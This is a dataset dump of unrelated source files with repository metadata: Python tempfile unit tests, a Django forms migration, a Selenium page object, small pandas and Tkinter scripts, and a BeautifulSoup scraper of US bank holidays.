# A TemporaryDirectory is deleted when garbage collected
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
name = d.name
del d # Rely on refcounting to invoke __del__
self.assertFalse(os.path.exists(name),
"TemporaryDirectory %s exists after __del__" % name)
finally:
os.rmdir(dir)
def test_del_on_shutdown(self):
# A TemporaryDirectory may be cleaned up during shutdown
with self.do_create() as dir:
for mod in ('builtins', 'os', 'shutil', 'sys', 'tempfile', 'warnings'):
code = """if True:
import builtins
import os
import shutil
import sys
import tempfile
import warnings
tmp = tempfile.TemporaryDirectory(dir={dir!r})
sys.stdout.buffer.write(tmp.name.encode())
tmp2 = os.path.join(tmp.name, 'test_dir')
os.mkdir(tmp2)
with open(os.path.join(tmp2, "test.txt"), "w") as f:
f.write("Hello world!")
{mod}.tmp = tmp
warnings.filterwarnings("always", category=ResourceWarning)
""".format(dir=dir, mod=mod)
rc, out, err = script_helper.assert_python_ok("-c", code)
tmp_name = out.decode().strip()
self.assertFalse(os.path.exists(tmp_name),
"TemporaryDirectory %s exists after cleanup" % tmp_name)
err = err.decode('utf-8', 'backslashreplace')
self.assertNotIn("Exception ", err)
self.assertIn("ResourceWarning: Implicitly cleaning up", err)
def test_warnings_on_cleanup(self):
# ResourceWarning will be triggered by __del__
with self.do_create() as dir:
d = self.do_create(dir=dir, recurse=3)
name = d.name
# Check for the resource warning
with support.check_warnings(('Implicitly', ResourceWarning), quiet=False):
warnings.filterwarnings("always", category=ResourceWarning)
del d
support.gc_collect()
self.assertFalse(os.path.exists(name),
"TemporaryDirectory %s exists after __del__" % name)
def test_multiple_close(self):
# Can be cleaned-up many times without error
d = self.do_create()
d.cleanup()
d.cleanup()
d.cleanup()
def test_context_manager(self):
# Can be used as a context manager
d = self.do_create()
with d as name:
self.assertTrue(os.path.exists(name))
self.assertEqual(name, d.name)
self.assertFalse(os.path.exists(name))
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| [
"tpsatish95@gmail.com"
] | tpsatish95@gmail.com |
b44c80c1722c93ac0ba0dae957fc214ed4cbfa59 | cca62aba8bc6b8ad498a0f40485529eefc10c713 | /shoptutorial/lib/python3.6/site-packages/aldryn_forms/migrations/0001_initial.py | bf9f2ffe2c39dfd8d3121cfb18fbe3d6359e5cc0 | [] | no_license | hamzafaisaljarral/scoop | 22af9f1362ed78f395ac558b7043ae2270e93217 | 72809299eea0e71a38e035fd15533c4dc13cdd37 | refs/heads/master | 2023-01-11T23:50:20.483475 | 2019-08-02T13:43:37 | 2019-08-02T13:43:37 | 158,827,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,713 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import filer.fields.folder
from django.conf import settings
import cms.models.fields
import sizefield.models
class Migration(migrations.Migration):
dependencies = [
('filer', '0002_auto_20150606_2003'),
('cms', '0003_auto_20140926_2347'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='EmailFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('email_send_notification', models.BooleanField(default=False, help_text='When checked, the value of this field will be used to send an email notification.', verbose_name='send notification when form is submitted')),
('email_subject', models.CharField(default='', help_text='Used as the email subject when email_send_notification is checked.', max_length=200, verbose_name='email subject', blank=True)),
('email_body', models.TextField(default='', help_text='Additional body text used when email notifications are active.', verbose_name='Additional email body', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FieldsetPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('legend', models.CharField(max_length=50, verbose_name='Legend', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FileUploadFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('max_size', sizefield.models.FileSizeField(help_text='The maximum file size of the upload, in bytes. You can use common size suffixes (kB, MB, GB, ...).', null=True, verbose_name='Maximum file size', blank=True)),
('upload_to', filer.fields.folder.FilerFolderField(verbose_name='Upload files to', to='filer.Folder', help_text='Select a folder to which all files submitted through this field will be uploaded to.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FormButtonPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label')),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FormData',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50, editable=False, db_index=True)),
('data', models.TextField(null=True, editable=False, blank=True)),
('language', models.CharField(default='en', max_length=10, verbose_name='language', choices=[('de', 'German'), ('en', 'English'), ('fr', 'French')])),
('people_notified', models.TextField(help_text='People who got a notification when form was submitted.', verbose_name='users notified', editable=False, blank=True)),
('sent_at', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'Form submission',
'verbose_name_plural': 'Form submissions',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FormPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(help_text='Used to filter out form submissions.', max_length=50, verbose_name='Name')),
('error_message', models.TextField(help_text="An error message that will be displayed if the form doesn't validate.", null=True, verbose_name='Error message', blank=True)),
('success_message', models.TextField(help_text='An success message that will be displayed.', null=True, verbose_name='Success message', blank=True)),
('redirect_type', models.CharField(help_text='Where to redirect the user when the form has been successfully sent?', max_length=20, verbose_name='Redirect to', choices=[('redirect_to_page', 'CMS Page'), ('redirect_to_url', 'Absolute URL')])),
('url', models.URLField(null=True, verbose_name='Absolute URL', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('form_template', models.CharField(default='aldryn_forms/form.html', max_length=200, verbose_name='form template', choices=[('aldryn_forms/form.html', 'Default')])),
('page', cms.models.fields.PageField(verbose_name='CMS Page', blank=True, to='cms.Page', null=True)),
('recipients', models.ManyToManyField(help_text='People who will get the form content via e-mail.', to=settings.AUTH_USER_MODEL, verbose_name='Recipients', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='ImageUploadFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('max_size', sizefield.models.FileSizeField(help_text='The maximum file size of the upload, in bytes. You can use common size suffixes (kB, MB, GB, ...).', null=True, verbose_name='Maximum file size', blank=True)),
('max_width', models.PositiveIntegerField(help_text='The maximum width of the uploaded image, in pixels.', null=True, verbose_name='Maximum image width', blank=True)),
('max_height', models.PositiveIntegerField(help_text='The maximum height of the uploaded image, in pixels.', null=True, verbose_name='Maximum image height', blank=True)),
('upload_to', filer.fields.folder.FilerFolderField(verbose_name='Upload files to', to='filer.Folder', help_text='Select a folder to which all files submitted through this field will be uploaded to.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.CharField(max_length=50, verbose_name='Value')),
('default_value', models.BooleanField(default=False, verbose_name='Default')),
('field', models.ForeignKey(editable=False, to='aldryn_forms.FieldPlugin')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextAreaFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('text_area_columns', models.PositiveIntegerField(null=True, verbose_name='columns', blank=True)),
('text_area_rows', models.PositiveIntegerField(null=True, verbose_name='rows', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
| [
"hamzafaisaljarral@gmail.com"
] | hamzafaisaljarral@gmail.com |
12f18400f128855b6ff8b05703994fd4e52cd2a6 | 62fe88bdfc12262dac265478f97cac6abd041ea3 | /Pages/AddEmployeePage.py | dad24f5fca9a3d88cf07a473e1d9fccbc114f85f | [] | no_license | sdjukic980/humanity | 090fc3ce82194649da93e29bdf3e735490aa5d2c | bbcc10eab16a76fb2a65fd6224eafccc14c7eb99 | refs/heads/master | 2020-12-03T00:18:56.030709 | 2017-07-04T19:12:54 | 2017-07-04T19:12:54 | 96,013,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | from Framework.basepageclass import BasePageClass
from Locators.AddEmployeePageLocators import AddEmployeePageLocator
class AddEmployeePage(BasePageClass):
def add_employee_name(self,name):
self.wait_for_element(*AddEmployeePageLocator.FIELDADDNAME1)
name1 = self.driver.find_element(*AddEmployeePageLocator.FIELDADDNAME1)
name1.send_keys(name)
def add_employee_lastname(self,lastname):
self.wait_for_element(*AddEmployeePageLocator.FIELDADDLASTNAME1)
name1 = self.driver.find_element(*AddEmployeePageLocator.FIELDADDLASTNAME1)
name1.send_keys(lastname)
def add_employee_email(self,email):
self.wait_for_element(*AddEmployeePageLocator.FIELDADDEMAIL1)
name1 = self.driver.find_element(*AddEmployeePageLocator.FIELDADDEMAIL1)
name1.send_keys(email)
def add_employe_as(self,name,lastname,email):
self.add_employee_name(name)
self.add_employee_lastname(lastname)
self.add_employee_email(email)
def save_employees(self):
btn_save = self.driver.find_element(*AddEmployeePageLocator.BTNSAVEEMPLOYEE)
btn_save.click()
def label_message(self):
self.wait_for_text(*AddEmployeePageLocator.LABEL)
label = self.driver.find_element(*AddEmployeePageLocator.LABEL)
return label.text
| [
"sdjukic980@gmail.com"
] | sdjukic980@gmail.com |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92 | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Data Science and Mechine Leraning/99.py | a816c6cc8a35dc07365ddd5a9e3c00881cf640da | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | import numpy as np
import pandas as pd
li = {'A': [1, 2, np.nan], 'B': [1, np.nan, np.nan], 'C': [1, 2, 3]}
li2 = pd.DataFrame(li)
li3 = li2.fillna(value='FILL VALUE')
print(li3) | [
"touhiduzzamantuhin95@gmail.com"
] | touhiduzzamantuhin95@gmail.com |
dbca292cb3bff6282f1d9cf3497023769aa3cd45 | e913d49911ad8b2c583e1bccaece8307091022b5 | /tk_test.py | c6d62747ae2cc08341d1b04cc4f4edefca6fa7d8 | [] | no_license | akaProgramer/python_tkinter | 6531c1c0fe3523a4df0b5c3fc2b65e77a90b5ae4 | 57d166b8d4e05051959b311e9b0e0b03715fbe5e | refs/heads/master | 2022-12-13T21:11:25.930960 | 2020-09-08T17:53:47 | 2020-09-08T17:53:47 | 282,791,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,887 | py | # from tkinter import *
# import math
# import parser
# import tkinter.messagebox
# root = Tk()
# root.title("Scientific Calculator")
# root.configure(background = 'green')
# root.resizable(width=False, height=False)
# root.geometry("480x568+0+0")
# calc = Frame(root)
# calc.grid()
# #**************************************************************#
# class Calc():
# def __init__(self):
# self.total=0
# self.current=''
# self.input_value=True
# self.check_sum=False
# self.op=''
# self.result=False
# def numberEnter(self, num):
# self.result=False
# firstnum=txtDisplay.get()
# secondnum=str(num)
# if self.input_value:
# self.current = secondnum
# self.input_value=False
# else:
# if secondnum == '.':
# if secondnum in firstnum:
# return
# self.current = firstnum+secondnum
# self.display(self.current)
# def sum_of_total(self):
# self.result=True
# self.current=float(self.current)
# if self.check_sum==True:
# self.valid_function()
# else:
# self.total=float(txtDisplay.get())
# def display(self, value):
# txtDisplay.delete(0, END)
# txtDisplay.insert(0, value)
# def valid_function(self):
# if self.op == "add":
# self.total += self.current
# if self.op == "sub":
# self.total -= self.current
# if self.op == "multi":
# self.total *= self.current
# if self.op == "divide":
# self.total /= self.current
# if self.op == "mod":
# self.total %= self.current
# self.input_value=True
# self.check_sum=False
# self.display(self.total)
# def operation(self, op):
# self.current = float(self.current)
# if self.check_sum:
# self.valid_function()
# elif not self.result:
# self.total=self.current
# self.input_value=True
# self.check_sum=True
# self.op=op
# self.result=False
# def Clear_Entry(self):
# self.result = False
# self.current = "0"
# self.display(0)
# self.input_value=True
# def All_Clear_Entry(self):
# self.Clear_Entry()
# self.total=0
# def pi(self):
# self.result = False
# self.current = math.pi
# self.display(self.current)
# def tau(self):
# self.result = False
# self.current = math.tau
# self.display(self.current)
# def e(self):
# self.result = False
# self.current = math.e
# self.display(self.current)
# def mathPM(self):
# self.result = False
# self.current = -(float(txtDisplay.get()))
# self.display(self.current)
# def squared(self):
# self.result = False
# self.current = math.sqrt(float(txtDisplay.get()))
# self.display(self.current)
# def cos(self):
# self.result = False
# self.current = math.cos(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def cosh(self):
# self.result = False
# self.current = math.cosh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def tan(self):
# self.result = False
# self.current = math.tan(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def tanh(self):
# self.result = False
# self.current = math.tanh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def sin(self):
# self.result = False
# self.current = math.sin(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def sinh(self):
# self.result = False
# self.current = math.sinh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def log(self):
# self.result = False
# self.current = math.log(float(txtDisplay.get()))
# self.display(self.current)
# def exp(self):
# self.result = False
# self.current = math.exp(float(txtDisplay.get()))
# self.display(self.current)
# def acosh(self):
# self.result = False
# self.current = math.acosh(float(txtDisplay.get()))
# self.display(self.current)
# def asinh(self):
# self.result = False
# self.current = math.asinh(float(txtDisplay.get()))
# self.display(self.current)
# def expm1(self):
# self.result = False
# self.current = math.expm1(float(txtDisplay.get()))
# self.display(self.current)
# def lgamma(self):
# self.result = False
# self.current = math.lgamma(float(txtDisplay.get()))
# self.display(self.current)
# def degrees(self):
# self.result = False
# self.current = math.degrees(float(txtDisplay.get()))
# self.display(self.current)
# def log2(self):
# self.result = False
# self.current = math.log2(float(txtDisplay.get()))
# self.display(self.current)
# def log10(self):
# self.result = False
# self.current = math.log10(float(txtDisplay.get()))
# self.display(self.current)
# def log1p(self):
# self.result = False
# self.current = math.log1p(float(txtDisplay.get()))
# self.display(self.current)
# added_value = Calc()
# #**************************************************************#
# txtDisplay = Entry(calc, font=('Helvetica',20,'bold'),bg='yellow', bd=30, width=28,
# justify=RIGHT)
# txtDisplay.grid(row=0,column=0, columnspan=4, pady=1)
# txtDisplay.insert(0,"0")
# numberpad = "789456123"
# i=0
# btn = []
# for j in range(2,5):
# for k in range(3):
# btn.append(Button(calc, width=6, height=2, bg="blue", font=('Helvetica',20,'bold'),bd=4,
# text=numberpad[i]))
# btn[i].grid(row=j, column= k, pady = 1)
# btn[i]["command"]=lambda x=numberpad[i]:added_value.numberEnter(x)
# i+=1
# #**************************************************************#
# btnClear = Button(calc, text=chr(67),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4, command=added_value.Clear_Entry).grid(row=1, column= 0, pady = 1)
# btnAllClear = Button(calc, text=chr(67)+chr(69),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.All_Clear_Entry).grid(row=1, column= 1, pady = 1)
# btnsq = Button(calc, text="\u221A",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.squared).grid(row=1, column= 2, pady = 1)
# btnAdd = Button(calc, text="+",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("add")
# ).grid(row=1, column= 3, pady = 1)
# btnSub = Button(calc, text="-",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("sub")
# ).grid(row=2, column= 3, pady = 1)
# btnMul = Button(calc, text="x",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("multi")
# ).grid(row=3, column= 3, pady = 1)
# btnDiv = Button(calc, text="/",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("divide")
# ).grid(row=4, column= 3, pady = 1)
# btnZero = Button(calc, text="0",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.numberEnter(0)
# ).grid(row=5, column= 0, pady = 1)
# btnDot = Button(calc, text=".",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.numberEnter(".")
# ).grid(row=5, column= 1, pady = 1)
# btnPM = Button(calc, text=chr(177),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.mathPM).grid(row=5, column= 2, pady = 1)
# btnEquals = Button(calc, text="=",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sum_of_total).grid(row=5, column= 3, pady = 1)
# #**************************************************************#
# btnPi = Button(calc, text="π",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.pi).grid(row=1, column= 4, pady = 1)
# btnCos = Button(calc, text="Cos",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.cos).grid(row=1, column= 5, pady = 1)
# btntan = Button(calc, text="tan",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tan).grid(row=1, column= 6, pady = 1)
# btnsin = Button(calc, text="sin",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sin).grid(row=1, column= 7, pady = 1)
# #**************************************************************#
# btn2Pi = Button(calc, text="2π",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tau).grid(row=2, column= 4, pady = 1)
# btnCosh = Button(calc, text="Cosh",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.cosh).grid(row=2, column= 5, pady = 1)
# btntanh = Button(calc, text="tanh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tanh).grid(row=2, column= 6, pady = 1)
# btnsinh = Button(calc, text="sinh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sinh).grid(row=2, column= 7, pady = 1)
# #**************************************************************#
# btnlog = Button(calc, text="log",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log).grid(row=3, column= 4, pady = 1)
# btnExp = Button(calc, text="exp",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.exp).grid(row=3, column= 5, pady = 1)
# btnMod = Button(calc, text="Mod",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("mod")
# ).grid(row=3, column= 6, pady = 1)
# btnE = Button(calc, text="e",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.e).grid(row=3, column= 7, pady = 1)
# #**************************************************************#
# btnlog10 = Button(calc, text="log10",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log10).grid(row=4, column= 4, pady = 1)
# btncos = Button(calc, text="log1p",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log1p).grid(row=4, column= 5, pady = 1)
# btnexpm1 = Button(calc, text="expm1",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.expm1).grid(row=4, column= 6, pady = 1)
# btngamma = Button(calc, text="gamma",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.lgamma).grid(row=4, column= 7, pady = 1)
# #**************************************************************#
# btnlog2 = Button(calc, text="log2",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log2).grid(row=5, column= 4, pady = 1)
# btndeg = Button(calc, text="deg",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.degrees).grid(row=5, column= 5, pady = 1)
# btnacosh = Button(calc, text="acosh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.acosh).grid(row=5, column= 6, pady = 1)
# btnasinh = Button(calc, text="asinh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.asinh).grid(row=5, column= 7, pady = 1)
# lblDisplay = Label(calc, text = "Scientific Calculator",font=('Helvetica',30,'bold'),
# fg='green',justify=CENTER)
# lblDisplay.grid(row=0, column= 4,columnspan=4)
# #**************************************************************#
# def iExit():
# iExit = tkinter.messagebox.askyesno("Scientific Calculator","Do you want to exit ?")
# if iExit>0:
# root.destroy()
# return
# def Scientific():
# root.resizable(width=False, height=False)
# root.geometry("944x568+0+0")
# def Standard():
# root.resizable(width=False, height=False)
# root.geometry("480x568+0+0")
# menubar = Menu(calc)
# filemenu = Menu(menubar, tearoff = 0)
# menubar.add_cascade(label = 'File', menu = filemenu)
# filemenu.add_command(label = "Standard", command = Standard)
# filemenu.add_command(label = "Scientific", command = Scientific)
# filemenu.add_separator()
# filemenu.add_command(label = "Exit", command = iExit)
# editmenu = Menu(menubar, tearoff = 0)
# menubar.add_cascade(label = 'Edit', menu = editmenu)
# editmenu.add_command(label = "Cut")
# editmenu.add_command(label = "Copy")
# editmenu.add_separator()
# editmenu.add_command(label = "Paste")
# root.config(menu=menubar)
# root.mainloop()
# import re
# p= re.compile("(-?\d+[.+\-*\/^%])*(\d+)")
# l= p.match("-9/0/9090.90*98089+09888-65878")
# print(l)
# print(l.())
import tkinter as tk # python 3.x
# import Tkinter as tk # python 2.x
class Example(tk.Frame):
def __init__(self, parent):
tk.Frame.__init__(self, parent)
# valid percent substitutions (from the Tk entry man page)
# note: you only have to register the ones you need; this
# example registers them all for illustrative purposes
#
# %d = Type of action (1=insert, 0=delete, -1 for others)
# %i = index of char string to be inserted/deleted, or -1
# %P = value of the entry if the edit is allowed
# %s = value of entry prior to editing
# %S = the text string being inserted or deleted, if any
# %v = the type of validation that is currently set
# %V = the type of validation that triggered the callback
# (key, focusin, focusout, forced)
# %W = the tk name of the widget
vcmd = (self.register(self.onValidate),
'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
self.entry = tk.Entry(self, validate="key", validatecommand=vcmd)
self.text = tk.Text(self, height=10, width=40)
self.entry.pack(side="top", fill="x")
self.text.pack(side="bottom", fill="both", expand=True)
def onValidate(self, d, i, P, s, S, v, V, W):
self.text.delete("1.0", "end")
self.text.insert("end","OnValidate:\n")
self.text.insert("end","d='%s'\n" % d)
self.text.insert("end","i='%s'\n" % i)
self.text.insert("end","P='%s'\n" % P)
self.text.insert("end","s='%s'\n" % s)
self.text.insert("end","S='%s'\n" % S)
self.text.insert("end","v='%s'\n" % v)
self.text.insert("end","V='%s'\n" % V)
self.text.insert("end","W='%s'\n" % W)
# Disallow anything but lowercase letters
if S == S.lower():
return True
else:
self.bell()
return False
if __name__ == "__main__":
root = tk.Tk()
Example(root).pack(fill="both", expand=True)
root.mainloop() | [
"51360466+akaProgramer@users.noreply.github.com"
] | 51360466+akaProgramer@users.noreply.github.com |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py | 23b546430bed3f5a69c3ef251e95a5ae2acb06fc | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,037 | py | from collections import defaultdict
import os
from u__.r.. import u..
from bs4 import BeautifulSoup
# prep data
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
u..(
f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
holidays_page
)
with open(holidays_page) as f:
content = f.read()
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
"""Receive scraped html output, make a BS object, parse the bank
holiday table (css class = list-table), and return a dict of
keys -> months and values -> list of bank holidays"""
soup = BeautifulSoup(content, 'html.parser')
right_table = soup.find('table', {'class': 'list-table'})
dates = []
for row in right_table.findAll('time'):
dates.append(row.text[5:7])
holiday = []
for row in right_table.findAll('a'):
holiday.append(row.text.strip())
l = zip(dates, holiday)
for k, v in l:
holidays[k].append(v)
return holidays | [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
